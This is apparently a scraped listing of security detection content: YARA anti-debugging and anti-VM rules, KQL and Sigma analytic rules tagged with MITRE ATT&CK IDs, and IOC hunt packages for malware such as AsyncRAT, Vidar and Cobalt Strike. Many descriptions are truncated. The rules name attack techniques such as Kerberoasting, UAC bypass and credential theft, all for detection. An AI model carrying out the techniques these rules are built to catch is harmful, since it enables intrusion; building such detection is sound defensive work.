The 'Check_VBox_DeviceMap' rule detects potential malicious activity involving VirtualBox device mapping, such as unauthorized device redirection or suspicious
Check VBox Guest Additions
yara low
YARA rule: Check_VBox_Guest_Additions
Check VBox VideoDrivers
yara low
YARA rule: Check_VBox_VideoDrivers
Check VmTools
yara low
The 'Check_VmTools' YARA rule detects artifacts associated with virtual machine tools, which may indicate evasion techniques or malicious activity in virtualized environments
Check VMWare DeviceMap
yara low
YARA rule: Check_VMWare_DeviceMap
Check Wine
yara low
YARA rule: Check_Wine
COM Event System Loading New DLL
kql medium
T1543
'This query uses Sysmon Image Load (Event ID 7) and Process Create (Event ID 1) data to look for COM Event System being used to load a newly seen DLL.'
DebuggerPattern CPUID
yara low
YARA rule: DebuggerPattern__CPUID
DebuggerPattern SEH Inits
yara low
YARA rule: DebuggerPattern__SEH_Inits
DebuggerPattern SEH Saves
yara low
YARA rule: DebuggerPattern__SEH_Saves
DSRM Account Abuse
kql high
T1098
'This query detects an abuse of the DSRM account in order to maintain persistence and access to the organization's Active Directory. Ref: https://adsecurity.org/?p=1785'
Fake computer account created
kql medium
T1564
SecurityEvent
'This query detects domain user accounts creation (event ID 4720) where the username ends with $. Accounts that end with $ are normally domain computer accounts and when they are created the event ID
T1098T1078
SecurityEventWindowsEvent
'Identifies when a recently created Group was added to a privileged built in domain local group or global group such as the Enterprise Admins, Cert Publishers or DnsAdmins. Be sure to verify this is
T1052
CloudAppEventsDeviceEventsDeviceFileEventsSecurityAlert
'This query looks for any mass download by a single user with possible file copy activity to a new USB drive. Malicious insiders may perform such activities that may cause harm to the organization. T
T1005
SecurityEventWindowsEvent
'This detection uses Windows security events to detect suspicious access attempts to the registry key of Microsoft Entra ID Health monitoring agent. This detection requires an access control entry (AC
T1005
SecurityEventWindowsEvent
'This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Microsoft Entra ID Health service agents (e.g AD FS). Information from AD H
T1059
SecurityEventWindowsEvent
'This query identifies when a process execution command-line indicates that a registry value is written to allow for later execution a malicious script References: https://www.microsoft.com/security/
T1547
SecurityEventWindowsEvent
'This query idenifies when rundll32.exe executes a specific set of inline VBScript commands References: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-
Modification of Accessibility Features
kql medium
T1546.008
'Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a
T1021
SecurityEventWindowsEvent
'Identifies when an RDP connection is made to multiple systems and above the normal connection count for the previous 7 days. Connections from the same system with the same account within the same day
T1134
SecurityEvent
'This query identifies Active Directory computer objects modifications that allow an adversary to abuse the Resource-based constrained delegation. This query checks for event id 5136 that the Object
Potential Build Process Compromise
kql medium
T1554
SecurityEventWindowsEvent
'The query looks for source code files being modified immediately after a build process is started. The purpose of this is to look for malicious code injection during the build process. More details:
Potential Kerberoasting
kql medium
T1558
SecurityEventWindowsEvent
'A service principal name (SPN) is used to uniquely identify a service instance in a Windows environment. Each SPN is usually associated with a service account. Organizations may have used service acc
Rare RDP Connections
kql medium
T1021
SecurityEventWindowsEvent
'Identifies when an RDP connection is new or rare related to any logon type by a given account today compared with the previous 14 days. RDP connections are indicated by the EventID 4624 with LogonTyp
RDP Nesting
kql medium
T1021
SecurityEventWindowsEvent
'Query detects potential lateral movement within a network by identifying when an RDP connection (EventID 4624, LogonType 10) is made to an initial system, followed by a subsequent RDP connection from
SEH Init
yara low
YARA rule: SEH_Init
SEH Save
yara low
YARA rule: SEH_Save
Solorigate Defender Detections
kql high
T1195
SecurityAlert
'Surfaces any Defender Alert for Solorigate Events. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query joins the DeviceInfo table to clearl
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Mirai
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 63 IOCs associated with ClearFake
ThreatFox: AMOS IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 7 IOCs associated with AMOS
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 7 IOCs associated with Unknown malware
ThreatFox: Unknown Loader IOCs
ioc-hunt high
UrlClickEvents
The "Unknown Loader" malware is a downloader that
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEventsUrlClickEvents
The "Unknown Stealer" malware is a data-exfiltration
ThreatFox: AsyncRAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with AsyncRAT
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with Nanocore RAT
ThreatFox: NetSupportManager RAT IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 15 IOCs associated with NetSupportManager RAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 87 IOCs associated with Vidar
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 26 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 26 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 30 malicious URLs tagged as elf
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as Mozi
URLhaus: sh Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as sh
URLhaus: ua-wget Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as ua-wget
Possibly employs anti-virtualization techniques
T1078T1489
AzureActivityIdentityInfoSecurityAlert
'This query will alert on any sign-ins from devices infected with malware in correlation with workspace deletion activity. Attackers may attempt to delete workspaces containing compute instances afte
T1112T1059.005
imRegistry
Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc. These processes are rarely used for legitimate registry modifica
HackTool - NetExec File Indicators
sigma high
T1021.002T1059.005
imFileEvent
Detects file creation events indicating NetExec (nxc.exe) execution on the local machine. NetExec is a PyInstaller-bundled binary that extracts its embedded data files to a "_MEI<random>" directory un
T1547.005
imRegistry
Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
HackTool - NetExec Execution
sigma high
T1018T1021
imProcessCreate
Detects execution of the hacktool NetExec. NetExec (formerly CrackMapExec) is a widely used post-exploitation tool designed for Active Directory penetration testing and network enumeration In enterpri
T1189
'This rule identifies a web request to a URL that holds a file type, including .ps1, .bat, .vbs, and .scr that can be harmful if downloaded. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) an
T1496
'This rule identifies a web request with a user agent header known to belong to a crypto miner. This indicates a crypto miner may have infected the client machine.<br>You can add custom crypto mining
T1059T1046T1021T1557T1102T1020
'This rule identifies a web request with a user agent header known to belong to a hacking tool. This indicates a hacking tool is used on the host.<br>You can add custom hacking tool indicating User-Ag
A host is potentially running PowerShell to send HTTP(S) requests (ASIM Web Session schema)
kql medium
T1132T1140T1059.001
'This rule identifies a web request with a user agent header known to belong PowerShell. <br>You can add custom Powershell indicating User-Agent headers using a watchlist, for more information refer t
Account created from non-approved sources
kql medium
T1136.003
AuditLogsSigninLogs
'This query looks for an account being created from a domain that is not regularly seen in a tenant. Attackers may attempt to add accounts from these sources as a means of establishing persistant ac
T1078.004
AuditLogsIdentityInfo
'Detects when a Temporary Access Pass (TAP) is created for a Privileged Account. A Temporary Access Pass is a time-limited passcode issued by an admin that satisfies strong authentication requiremen
ADFS DKM Master Key Export
kql medium
T1005
DeviceEventsSecurityEventWindowsEvent
'Identifies an export of the ADFS DKM Master Key from Active Directory. References: https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/, https://cloud.go
Anomalous login followed by Teams action
kql medium
T1199T1136T1078T1098
AADNonInteractiveUserSignInLogsOfficeActivitySigninLogs
'Detects anomalous IP address usage by user accounts and then checks to see if a suspicious Teams action is performed. Query calculates IP usage Delta for each user account and selects accounts where
Anomaly Sign In Event from an IP
kql medium
T1078
SigninLogs
'Identifies sign-in anomalies from an IP in the last hour, targeting multiple users where the password is correct after multiple attempts'
T1211T1059T1190T0890
AzureDiagnostics
'Identifies a match for SQL Injection attack in the Application gateway WAF logs. The Threshold value in the query can be changed as per your infrastructure's requirement. References: https://owasp.o
T1189T1203T0853
AzureDiagnostics
'Identifies a match for XSS attack in the Application gateway WAF logs. The Threshold value in the query can be changed as per your infrastructure's requirement. References: https://owasp.org/www-pro
Application ID URI Changed
kql medium
T1078.004
AuditLogs
'Detects changes to an Application ID URI. Monitor these changes to make sure that they were authorized. Ref: https://docs.microsoft.com/azure/active-directory/fundamentals/security-operations-app
Application Redirect URL Update
kql medium
T1078.004
AuditLogs
'Detects the redirect URL of an app being changed. Applications associated with URLs not controlled by the organization can pose a security risk. Ref: https://docs.microsoft.com/azure/active-direc
AppServices AV Scan Failure
kql low
AuditLogs
'Identifies if an AV scan fails in Azure App Services.'
AuditLogs
'Identifies if an AV scan finds infected files in Azure App Services.'
T1204
DeviceProcessEventsSecurityEvent
This detects attempts to manipulate audit policies using auditpol command. This technique was seen in relation to Solorigate attack but the results can indicate potential malicious activity used in di
T1486
SecurityAlert
'This query looks for Microsoft Defender AV detections related to Dev-0530 actors. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query join
T1486
SecurityAlert
'This query looks for Microsoft Defender AV detections related to Europium actor. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query join
T1486
SecurityAlert
'This query looks for Microsoft Defender AV detections related to Hive Ransomware. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query joins
T1562.008
AzureActivity
'This query looks for diagnostic settings that are removed from a resource. This could indicate an attacker or malicious internal trying to evade detection before malicious act is performed. If the di
T1570T1212
AzureActivityBehaviorAnalytics
'Identifies when the Azure Run Command operation is executed by a UserPrincipalName and IP Address that has resulted in a recent user entity behaviour alert.'
T1570T1059.001
AzureActivityDeviceEventsDeviceFileEvents
'Identifies when Azure Run command is used to execute a PowerShell script on a VM that is unique. The uniqueness of the PowerShell script is determined by taking a combined hash of the cmdLets it impo
T1078.004
AuditLogs
'Detects changes to an applications sign out URL. Look for any modifications to a sign out URL. Blank entries or entries to non-existent locations would stop a user from terminating a session. Ref
Changes to Application Ownership
kql medium
T1078.004
AuditLogs
'Detects changes to the ownership of an appplicaiton. Monitor these changes to make sure that they were authorized. Ref: https://learn.microsoft.com/en-gb/entra/architecture/security-operations-ap
Changes to PIM Settings
kql high
T1078.004
AuditLogs
'PIM provides a key mechanism for assigning privileges to accounts, this query detects changes to PIM role settings. Monitor these changes to ensure they are being made legitimately and don't confer
T1078
AADNonInteractiveUserSignInLogsCommonSecurityLogSigninLogs
'Correlate IPs blocked by a Cisco firewall appliance with successful Microsoft Entra ID signins. Because the IP was blocked by the firewall, that same IP logging on successfully to Entra ID is potenti
'IP addresses of broadband links that usually indicates users attempting to access their home network, for example for a remote session to a home computer.'
'Detects first connection to an unpopular website (possible malicious payload delivery).'
'Detects suspicious user agent strings used by crypto miners in proxy logs.'
Cisco Umbrella - Empty User Agent Detected
kql medium
'Rule helps to detect empty and unusual user agent indicating web browsing activity by an unusual process other than a web browser.'
'Detects suspicious user agent strings used by known hack tools'
Cisco Umbrella - Rare User Agent Detected
kql medium
'Rule helps to detect a rare user-agents indicating web browsing activity by an unusual process other than a web browser.'
'It is reccomended that these Categories shoud be blocked by policies because they provide harmful/malicious content..'
'Detects request to potentially harmful file types (.ps1, .bat, .vbs, etc.).'
Cisco Umbrella - URI contains IP address
kql medium
'Malware can use IP address to communicate with C2.'
'Rule helps to detect Powershell user-agent activity by an unusual process other than a web browser.'
T1574
DeviceRegistryEventsSecurityEvent
'This query looks for changes to COM registry keys to point to files in C:\Windows\System32\spool\drivers\color\. This can be used to enable COM hijacking for persistence. Ref: https://www.microso
T1078.004
AuditLogs
'Detects a Conditional Access Policy being modified by a user who has not modified a policy in the last 14 days. A threat actor may try to modify policies to weaken the security controls in place.
CreepyDrive request URL sequence
kql high
T1567.002T1102.002
CommonSecurityLog
'CreepyDrive uses OneDrive for command and control, however, it makes regular requests to predicatable paths. This detecton will alert when over 20 sequences are observed in a single day.'
CreepyDrive URLs
kql high
T1567.002T1102.002
CommonSecurityLog
'CreepyDrive uses OneDrive for command and control. This detection identifies URLs specific to CreepyDrive.'
Detect PIM Alert Disabling activity
kql medium
T1098T1078
AuditLogs
'Privileged Identity Management (PIM) generates alerts when there is suspicious or unsafe activity in Microsoft Entra ID (Azure AD) organization. This query will help detect attackers attempts to dis
Detecting Impossible travel with mailbox permission tampering & Privilege Escalation attempt
kql medium
T1078T1548
AuditLogsOfficeActivitySecurityAlert
'This hunting query will alert on any Impossible travel activity in correlation with mailbox permission tampering followed by account being added to a PIM managed privileged group. Ensure this impossi
T1569T1003
DeviceProcessEventsSecurityAlert
'This hunting query looks for file paths/hashes related to observed activity by Dev-0228. The actor is known to use custom version of popular tool like PsExec, Procdump etc. to carry its activity. Th
Dev-0530 File Extension Rename
kql high
T1486
DeviceFileEventsimFileEvent
'Dev-0530 actors are known to encrypt the contents of the victims device as well as renaming the file extensions. This query looks for the creation of files with .h0lyenc extension or presence of rans
Email access via active sync
kql medium
T1068T1078
DeviceProcessEventsSecurityEventWindowsEvent
This query detects attempts to add attacker devices as allowed IDs for active sync using the Set-CASMailbox command. This technique was seen in relation to Solorigate attack but the results can indica
T1078.004
AuditLogs
'Detects a user's consent to an OAuth application being blocked due to it being too risky. These events should be investigated to understand why the user attempted to consent to the applicaiton and
T1071T1003
CommonSecurityLogDeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDnsEventsOfficeActivityVMConnectionimFileEvent
'Identifies a match across various data feeds for hashes and IP IOC related to Europium Reference: https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-t
Exchange Worker Process Making Remote Call
kql medium
T1059.001T1059.003
DeviceProcessEventsW3CIISLog
'This query dynamically identifies Exchange servers and then looks for instances where the IIS worker process initiates a call out to a remote URL using either cmd.exe or powershell.exe. This behaviou
T1078T1110
SigninLogs
'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to AWS Console. Uses that list to identify any successful Microsoft Entra ID logons from these IPs with
T1078T1110
AADNonInteractiveUserSignInLogsSigninLogs
'Identifies a list of IP addresses with a minimum number (defualt of 5) of failed logon attempts to Microsoft Entra ID. Uses that list to identify any successful AWS Console logons from these IPs with
T1078T1110
AADNonInteractiveUserSignInLogsSecurityEventSigninLogsSyslogWindowsEvent
'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to Microsoft Entra ID. Uses that list to identify any successful remote logons to hosts from these IPs
T1078T1110
AADNonInteractiveUserSignInLogsSecurityEventSigninLogsSyslogWindowsEvent
'Identifies a list of IP addresses with a minimum number(default of 5) of failed logon attempts to remote hosts. Uses that list to identify any successful logons to Microsoft Entra ID from these IPs w
T1071T1571
CommonSecurityLog
'Identifies patterns in the time deltas of contacts between internal and external IPs in Fortinet network data that are consistent with beaconing. Accounts for randomness (jitter) and seasonality suc
T1210
SecurityEventWindowsEvent
'This query detects instances where an attacker has gained the ability to execute code on an ADFS Server through remote WMI Execution. In order to use this query you need to be collecting Sysmon Event
T1078.004
AuditLogs
'Detects when a Guest User is added by a user account that has not been seen adding a guest in the previous 14 days. Monitoring guest accounts and the access they are provided is important to detect
T1078T1098T1114
OfficeActivitySigninLogs
'It is possible that a disabled user account is compromised and another account on the same IP is used to perform operations that are not typical for that user. The query filters the SigninLogs for e
T1570
DeviceProcessEventsSecurityEventimProcessCreate
'The query below identifies powershell commands used by the threat actor Mango Sandstorm. Reference: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-u
T1041T1071.001
CommonSecurityLogDeviceNetworkEvents
'This detection will identify network requests in HTTP proxy data that contains Base64 encoded IP addresses. After identifying candidates the query joins with DeviceNetworkEvents to idnetify any machi
T1078T1110
AADNonInteractiveUserSignInLogsCommonSecurityLogSigninLogs
This query creates a list of IP addresses with the number of failed login attempts to Entra ID above a set threshold ( default of 5 ). It then looks for any successful Palo Alto VPN logins from any
T1071
AzureDiagnosticsCommonSecurityLogVMConnection
'Matches domain name IOCs related to Forest Blizzard group activity published July 2019 with CommonSecurityLog, DnsEvents and VMConnection dataTypes. References: https://blogs.microsoft.com/on-the-iss
T1078
CommonSecurityLogSecurityAlertSigninLogs
'This content is employed to correlate with Microsoft Defender XDR phishing-related alerts. It focuses on instances where a user successfully connects to a phishing URL from a non-Microsoft network de
Malformed user agent
kql medium
T1189T1071T1203
AADNonInteractiveUserSignInLogsAzureDiagnosticsOfficeActivitySigninLogsW3CIISLog
'Malware authors will sometimes hardcode user agent string values when writing the network communication component of their malware. Malformed user agents can be an indication of such malware.'
T1071
AzureDiagnosticsCommonSecurityLogDeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDnsEventsOfficeActivityVMConnectionimFileEvent
'Identifies a match across various data feeds for domains, hashes and IP IOC related to Mercury Reference: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabiliti
Microsoft Defender for Endpoint (MDE) signatures for Azure Synapse pipelines and Azure Data Factory
kql high
T1190
SecurityAlert
'This query looks for Microsoft Defender for Endpoint detections related to the remote command execution attempts on Azure IR with Managed VNet or SHIR. In Microsoft Sentinel, the SecurityAlerts tabl
Missing Domain Controller Heartbeat
kql high
T1499T1564
Heartbeat
'This detection will go over the heartbeats received from the agents of Domain Controllers over the last hour, and will create alerts if the last heartbeats were received an hour ago.'
Multiple Password Reset by user
kql low
T1078T1110
AuditLogsOfficeActivitySecurityEventSyslogWindowsEvent
'This query will determine multiple password resets by user across multiple data sources. Account manipulation including password reset may aid adversaries in maintaining access to credentials and cer
NRT Malicious Inbox Rule
kql medium
T1098T1078
OfficeActivity
'Often times after the initial compromise the attackers create inbox rules to delete emails that contain certain keywords. This is done so as to limit ability to warn compromised users that they've b
T1114T1020
OfficeActivity
'Identifies when multiple (more than one) users mailboxes are configured to forward to the same destination. This could be an attacker-controlled destination mailbox configured to collect mail from mu
OMI Vulnerability Exploitation
kql medium
T1190
Heartbeat
Following the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vu
PE file dropped in Color Profile Folder
kql medium
T1203
DeviceFileEvents
'This query looks for writes of PE files to C:\Windows\System32\spool\drivers\color\. This is a common directory used by malware, as well as some legitimate programs, and writes of PE files to the f
T1566
CommonSecurityLogSecurityAlert
'The purpose of this content is to identify successful phishing links accessed by users. Once a user clicks on a phishing link, we observe successful network activity originating from non-Microsoft ne
T1568
CommonSecurityLog
'Identifies contacts with domains names in CommonSecurityLog that might have been generated by a Domain Generation Algorithm (DGA). DGAs can be used by malware to generate rendezvous points that are d
T1568
'This rule identifies communication with hosts that have a domain name that might have been generated by a Domain Generation Algorithm (DGA). DGAs are used by malware to generate rendezvous points tha
T1548.002
imRegistry
'This detection looks for the steps required to conduct a UAC bypass using Fodhelper.exe. By default this detection looks for the setting of the required registry keys and the invoking of the process
Prestige ransomware IOCs Oct 2022
kql high
T1203
CommonSecurityLogDeviceEventsDeviceFileEventsDeviceImageLoadEventsSecurityAlertimFileEvent
'This query looks for file hashes and AV signatures associated with Prestige ransomware payload.'
T1190
'This query identifies exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893) to the VPN server'
T1071
CommonSecurityLogSigninLogs
'This content is utilized to identify instances of successful login by risky users, who have been observed engaging in potentially suspicious network activity on non-Microsoft network devices.'
RunningRAT request parameters
kql high
T1041T1071.001
CommonSecurityLog
'This detection will alert when RunningRAT URI parameters or paths are detect in an HTTP request. Id the device blocked this communication presence of this alert means the RunningRAT implant is likely
T1562
DeviceProcessEventsSecurityEventWindowsEvent
'Identifies attempts to modify registry ACL to evade security solutions. In the Solorigate attack, the attackers were found modifying registry permissions so services.exe cannot access the relevant re
T1078.004
AuditLogs
'Detects a Service Principal being assigned an app role that has sensitive access such as Mail.Read. A threat actor who compromises a Service Principal may assign it an app role to allow it to acces
Service Principal Assigned Privileged Role
kql medium
T1078.004
AuditLogs
'Detects a privileged role being added to a Service Principal. Ensure that any assignment to a Service Principal is valid and appropriate - Service Principals should not be assigned to very highly p
Star Blizzard C2 Domains August 2022
kql high
T1566
AzureDiagnosticsCommonSecurityLogDeviceNetworkEventsEmailEventsEmailUrlInfoVMConnection
'Identifies a match across various data feeds for domains related to an actor tracked by Microsoft as Star Blizzard.'
DeviceProcessEvents
Identifies suspicious child processes of SolarWinds.Orion.Core.BusinessLayer.dll that may be evidence of the SUNBURST backdoor References: - https://www.fireeye.com/blog/threat-research/2020/12/evasiv
T1078.004
AuditLogs
' This query will detect when an attempt is made to update an existing user and link it to an guest or external identity. These activities are unusual and such linking of external identities should b
Suspicious Login from deleted guest account
kql medium
T1078.004
AuditLogsSigninLogs
' This query will detect logins from guest account which was recently deleted. For any successful logins from deleted identities should be investigated further if any existing user accounts have been
T1078.004
AuditLogsIdentityInfo
'This query will detect if user properties of Global Administrator are updated by an existing user. Usually only user administrator or other global administrator can update such properties. Investigat
T1078.004
BehaviorAnalytics
'This query looks for sign ins by the Microsoft Entra ID Connect Sync account to Azure where properties about the logon are anomalous. This query uses Microsoft Sentinel's UEBA features to detect thes
T1078T1106T1526
AuditLogsIdentityInfoSecurityAlert
'This detection identifies high-severity alerts across various Microsoft security products, including Microsoft Defender XDR and Microsoft Entra ID, and correlates them with instances of Google Cloud
T1030
CommonSecurityLog
'Identifies anamalous spikes in network traffic logs as compared to baseline or normal historical patterns. The query leverages a KQL built-in anomaly detection algorithm to find large deviations from
T1030
CommonSecurityLogVMConnection
'Identifies anomalous data transfer to public networks. The query leverages built-in KQL anomaly detection algorithms that detects large deviations from a baseline pattern. A sudden increase in data t
Trust Monitor Event
kql medium
T1528T1555
'This query identifies when a new trust monitor event is detected.'
Unusual Anomaly
kql medium
'Anomaly Rules generate events in the Anomalies table. This scheduled rule tries to detect Anomalies that are not usual, they could be a type of Anomaly that has recently been activated, or an infrequ
T1136
DeviceProcessEventsSecurityEvent
' The query below identifies creation of unusual identity by the Europium actor to mimic Microsoft Exchange Health Manager Service account using Exchange PowerShell commands Reference: https://www.m
T1078.004
AuditLogsSigninLogs
'Detects a URL being added to an application where the domain is not one that is associated with the tenant. The query uses domains seen in sign in logs to determine if the domain is associated with
T1136.003
AuditLogs
'This query looks for accounts being created where the name does not match a defined pattern. Attackers may attempt to add accounts as a means of establishing persistant access to an environment, lo
T1136.003
AuditLogs
'This query looks for accounts being created that do not have attributes populated that are commonly populated in the tenant. Attackers may attempt to add accounts as a means of establishing persist
User State changed from Guest to Member
kql medium
T1098
AuditLogs
'Detects when a guest account in a tenant is converted to a member of the tenant. Monitoring guest accounts and the access they are provided is important to detect potential account abuse. Account
T1530T1213T1020
This query monitors for users running Log Analytics queries that contain filters for specific, defined VIP user accounts or the VIPUser watchlist template. Use this detection to alert for users specif
T1110
CommonSecurityLog
'Identifies instances where Wazuh logged over 400 '403' Web Errors from one IP Address. To onboard Wazuh data into Sentinel please view: https://documentation.wazuh.com/current/cloud-security/azure/in
T1041T1071.001
CommonSecurityLogDeviceEvents
'This detection will identify network requests in HTTP proxy data that contains Base64 encoded usernames from machines in the DeviceEvents table. This technique was seen usee by POLONIUM in their Runn
T1036.002
imProcessCreate
Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This character is used as an obfuscation and masquerad
T1059T1027T1140
imProcessCreate
'Identifies instances of a base64 encoded PE file header seen in the process command line parameter. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://ak
T1110
imAuthentication
'Identifies evidence of brute force activity against a user based on multiple authentication failures and at least one successful authentication within a given time window. Note that the query does no
DebuggerCheck DrWatson
yara low
YARA rule: DebuggerCheck__DrWatson
DebuggerCheck GlobalFlags
yara low
YARA rule: DebuggerCheck__GlobalFlags
DebuggerCheck PEB
yara low
YARA rule: DebuggerCheck__PEB
DebuggerCheck QueryInfo
yara low
YARA rule: DebuggerCheck__QueryInfo
DebuggerCheck RemoteAPI
yara low
YARA rule: DebuggerCheck__RemoteAPI
DebuggerException ConsoleCtrl
yara low
YARA rule: DebuggerException__ConsoleCtrl
DebuggerException SetConsoleCtrl
yara low
YARA rule: DebuggerException__SetConsoleCtrl
DebuggerException UnhandledFilter
yara low
YARA rule: DebuggerException__UnhandledFilter
DebuggerHiding Active
yara low
YARA rule: DebuggerHiding__Active
DebuggerHiding Thread
yara low
YARA rule: DebuggerHiding__Thread
DebuggerOutput String
yara low
YARA rule: DebuggerOutput__String
DebuggerPattern RDTSC
yara low
YARA rule: DebuggerPattern__RDTSC
DebuggerTiming PerformanceCounter
yara low
YARA rule: DebuggerTiming__PerformanceCounter
DebuggerTiming Ticks
yara low
YARA rule: DebuggerTiming__Ticks
T1569T1003
SecurityAlertimProcessCreate
'This hunting query looks for file paths/hashes related to observed activity by Dev-0228. The actor is known to use custom version of popular tool like PsExec, Procdump etc. to carry its activity. Th
T1071.001
'Identifies callouts to Discord CDN addresses for risky file extensions. This detection will trigger when a callout for a risky file is made to a discord server that has only been seen once in your en
T1496
'Identifies IP addresses that may be performing DNS lookups associated with common currency mining pools. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in or custom s
T1048
'Identifies IP addresses performing DNS lookups associated with common ToR proxies. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in or custom source that supports th
T1110T1556
This rule identifies a source that repeatedly fails to authenticate to a web service (HTTP response code 403). This may indicate a [brute force](https://en.wikipedia.org/wiki/Brute-force_attack) or [c
T1568T1008
'This creates an incident in the event a client generates excessive amounts of DNS queries for non-existent domains. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in
T1564
imProcessCreate
'Identifies malware that has been hidden in the recycle bin. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimProcessEvent)'
Midnight Blizzard - suspicious rundll32.exe execution of vbscript (Normalized Process Events)
kql medium
T1547
imProcessCreate
'This query idenifies when rundll32.exe executes a specific set of inline VBScript commands References: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-m
T1072T1570
'This detection highlights executables deployed to hosts via either the Default Domain or Default Domain Controller Policies. These policies apply to all hosts or Domain Controllers and best practice
Potential DGA detected (ASIM DNS Schema)
kql medium
T1568T1008
DnsEvents
'Identifies clients with a high NXDomain count which could be indicative of a DGA (cycling through possible C2 domains where most C2s are not live). Alert is generated when a new IP address is seen (b
T1110
imAuthentication
'This query searches for failed attempts to log in from more than 15 various users within a 5 minute timeframe from the same source. This is a potential indication of a password spray attack To use t
T1485T1036
'This detection looks for command line parameters associated with the use of Sysinternals sdelete (https://docs.microsoft.com/sysinternals/downloads/sdelete) to delete multiple files on a host's C dri
T1018
imProcessCreate
'Identifies the host and account that executed AdFind by hash and filename in addition to common and unique flags that are used by many threat actors in discovery. To use this analytics rule, make sur
T1485
'This query looks for the Sdelete process being run recursively after being deployed to a host via GPO. Attackers could use this technique to deploy Sdelete to multiple host and delete data on them.
SEH v3
yara low
YARA rule: SEH__v3
SEH v4
yara low
YARA rule: SEH__v4
SEH vba
yara low
YARA rule: SEH__vba
SEH vectored
yara low
YARA rule: SEH__vectored
Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
kql medium
T1078T1098
imAuthentication
'Identifies IPs with failed attempts to sign in to one or more disabled accounts signed in successfully to another account. To use this analytics rule, make sure you have deployed the [ASIM normalizat
T1195T1059T1546
imFileEvent
Identifies SolarWinds SUNBURST and SUPERNOVA backdoor file hash IOCs in File Events To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimFileEven
T1059T1543
imProcessCreate
Identifies suspicious child processes of SolarWinds.Orion.Core.BusinessLayer.dll that may be evidence of the SUNBURST backdoor References: - https://www.fireeye.com/blog/threat-research/2020/12/evasiv
ThreadControl Context
yara low
YARA rule: ThreadControl__Context
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 108 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 31 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 14 IOCs associated with Cobalt Strike
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Havoc
ThreatFox: Meterpreter IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Meterpreter
ThreatFox: NetSupportManager RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with NetSupportManager RAT
